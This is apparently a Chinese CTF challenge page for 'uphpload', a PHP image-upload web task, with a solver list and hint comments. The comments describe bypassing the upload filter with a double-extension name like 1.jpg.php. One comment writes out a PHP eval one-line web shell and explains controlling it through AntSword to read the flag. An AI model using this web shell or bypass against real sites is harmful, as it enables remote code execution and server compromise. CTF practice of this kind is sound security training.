uphploadWEB 未解决
分数:
0
金币:
0
题目作者:
未知
一 血:
niano.0
一血奖励:
0金币
解 决:
71
提 示:
描 述:
I made a website to collect reaction images, feel free to upload some!
(provide them the ip, if you're following the setup to test the challgenge it would be the ip of the machine running the docker container)
评分(0)
暂无评分
解题动态

dir_tree 攻破了该题 1月前

biandanjun 攻破了该题 1月前

倦鸟叫了一整天 攻破了该题 1月前

luogen 攻破了该题 1月前

yanzong668 攻破了该题 1月前

tianna 攻破了该题 1月前

111lsg 攻破了该题 1月前

wcsndm 攻破了该题 2月前

Ru1n 攻破了该题 2月前

流云拂袖 攻破了该题 2月前

test002 攻破了该题 2月前

coldplay99999 攻破了该题 2月前

WCRH 攻破了该题 2月前

tmwxtavpoh 攻破了该题 2月前

Fireball 攻破了该题 3月前

bugbiubiubiu 攻破了该题 3月前

zhaoxp 攻破了该题 4月前

MemoryLave 攻破了该题 4月前

xggs 攻破了该题 4月前

评论
dir_tree 1月前
举报
检测是从左到右利用中间件解析规则从右到左绕过检测,成功解析php文件,上传一个phpinfo,在里面有flag
gooddemo 1年前
举报
先定义一个文件1.jpg.php,在这个文件里面写入一句话木马<?php @eval($_POST['hack']); ?>,通过upload上传该文件,然后通过蚁剑连接,在根路径找到/flag_is_here/flag.txt
18655201958 1年前
举报
flag 在根目录
206297162 1年前
举报
兄弟们双写绕过 在1.jpg.php